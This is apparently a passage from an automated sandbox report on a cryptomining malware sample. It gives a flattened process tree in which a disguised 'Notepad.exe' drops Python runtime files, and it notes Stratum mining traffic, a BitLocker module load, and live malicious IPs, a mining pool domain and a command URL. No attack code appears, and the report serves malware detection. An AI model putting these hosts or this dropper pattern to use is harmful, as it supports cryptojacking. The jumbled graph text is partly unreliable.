other processes 38->60 56 conhost.exe 40->56         started        58 wusa.exe 40->58         started        file9 173 Detected Stratum mining protocol 139->173 signatures10 process11 file12 109 C:\Users\user109otepad.exe, PE32+ 42->109 dropped 111 C:\Users\user\activate.bat, ASCII 42->111 dropped 62 cmd.exe 42->62         started        141 Loading BitLocker PowerShell Module 49->141 64 conhost.exe 49->64         started        66 conhost.exe 52->66         started        68 conhost.exe 54->68         started        70 wusa.exe 54->70         started        72 conhost.exe 60->72         started        74 conhost.exe 60->74         started        76 conhost.exe 60->76         started        78 7 other processes 60->78 signatures13 process14 process15 80 Notepad.exe 62->80         started        83 conhost.exe 62->83         started        85 taskkill.exe 62->85         started        file16 89 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 80->89 dropped 91 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 80->91 dropped 93 C:\Users\user\AppData\Local\...\python312.dll, PE32+ 80->93 dropped 95 10 other malicious files 80->95 dropped 87 Notepad.exe 80->87         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
95.179.241.203
 unknown Netherlands
20473 AS-CHOOPAUS true
51.195.206.227
 unknown France
16276 OVHFR true
163.5.160.27
 unknown France
56339 EPITECHFR true

Contacted Domains

Name IP Active
pool.hashvault.pro 45.76.89.70 true
api.ip.sb unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
163.5.160.27:51523 true
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://163.5.160.27:51523/ true
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown